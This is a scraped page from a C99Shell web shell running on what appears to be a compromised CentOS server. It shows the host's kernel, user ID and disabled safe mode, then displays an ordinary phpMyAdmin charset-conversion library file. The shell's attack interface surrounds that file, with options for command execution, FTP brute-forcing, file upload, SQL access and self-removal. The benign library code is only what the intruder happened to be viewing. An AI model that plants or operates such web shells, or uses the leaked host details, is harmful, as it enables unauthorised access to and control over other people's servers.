!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/usr/share/phpMyAdmin/libraries/   drwxr-xr-x
Free 9.28 GB of 93.48 GB (9.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     charset_conversion.lib.php (3.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Charset conversion functions.
 *
 * @package PhpMyAdmin
 */
if (! defined('PHPMYADMIN')) {
    exit;
}

define('PMA_CHARSET_NONE'0);
define('PMA_CHARSET_ICONV'1);
define('PMA_CHARSET_RECODE'2);
define('PMA_CHARSET_ICONV_AIX'3);
define('PMA_CHARSET_MB'4);

if (! isset(
$GLOBALS['cfg']['RecodingEngine'])) {
    
$GLOBALS['cfg']['RecodingEngine'] = '';
}
// Finally detect which function we will use:
if ($GLOBALS['cfg']['RecodingEngine'] == 'iconv') {
    if (@
function_exists('iconv')) {
        
$PMA_recoding_engine PMA_getIconvRecodingEngine();
    } else {
        
$PMA_recoding_engine PMA_CHARSET_NONE;
        
PMA_warnMissingExtension('iconv');
    }
} elseif (
$GLOBALS['cfg']['RecodingEngine'] == 'recode') {
    if (@
function_exists('recode_string')) {
        
$PMA_recoding_engine PMA_CHARSET_RECODE;
    } else {
        
$PMA_recoding_engine PMA_CHARSET_NONE;
        
PMA_warnMissingExtension('recode');
    }
} elseif (
$GLOBALS['cfg']['RecodingEngine'] == 'mb') {
    if (@
function_exists('mb_convert_encoding')) {
        
$PMA_recoding_engine PMA_CHARSET_MB;
    } else {
        
$PMA_recoding_engine PMA_CHARSET_NONE;
        
PMA_warnMissingExtension('mbstring');
    }
} elseif (
$GLOBALS['cfg']['RecodingEngine'] == 'auto') {
    if (@
function_exists('iconv')) {
        
$PMA_recoding_engine PMA_getIconvRecodingEngine();
    } elseif (@
function_exists('recode_string')) {
        
$PMA_recoding_engine PMA_CHARSET_RECODE;
    } elseif (@
function_exists('mb_convert_encoding')) {
        
$PMA_recoding_engine PMA_CHARSET_MB;
    } else {
        
$PMA_recoding_engine PMA_CHARSET_NONE;
    }
} else {
    
$PMA_recoding_engine PMA_CHARSET_NONE;
}

/* Load AIX iconv wrapper if needed */
if ($PMA_recoding_engine == PMA_CHARSET_ICONV_AIX) {
    include_once 
'./libraries/iconv_wrapper.lib.php';
}

/**
 * Determines the correct recoding engine to use 
 *
 * @return int $PMA_recoding_engine 
 *
 * @access  public
 *
 */
function PMA_getIconvRecodingEngine()
{
    if ((@
stristr(PHP_OS'AIX'))
        && (@
strcasecmp(ICONV_IMPL'unknown') == 0)
        && (@
strcasecmp(ICONV_VERSION'unknown') == 0)
    ) {
        return 
PMA_CHARSET_ICONV_AIX;
    } else {
        return 
PMA_CHARSET_ICONV;
    }
}

/**
 * Converts encoding of text according to parameters with detected
 * conversion function.
 *
 * @param string $src_charset  source charset
 * @param string $dest_charset target charset
 * @param string $what         what to convert
 *
 * @return string   converted text
 *
 * @access  public
 *
 */
function PMA_convertString($src_charset$dest_charset$what)
{
    if (
$src_charset == $dest_charset) {
        return 
$what;
    }
    switch (
$GLOBALS['PMA_recoding_engine']) {
    case 
PMA_CHARSET_RECODE:
        return 
recode_string($src_charset '..'  $dest_charset$what);
    case 
PMA_CHARSET_ICONV:
        return 
iconv(
            
$src_charset$dest_charset $GLOBALS['cfg']['IconvExtraParams'], $what
        
);
    case 
PMA_CHARSET_ICONV_AIX:
        return 
PMA_convertAIXIconv(
            
$src_charset$dest_charset $GLOBALS['cfg']['IconvExtraParams'], $what
        
);
    case 
PMA_CHARSET_MB:
        return 
mb_convert_encoding(
            
$what$dest_charset$src_charset
        
);
    default:
        return 
$what;
    }
//  end of the "PMA_convertString()" function

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0042 ]--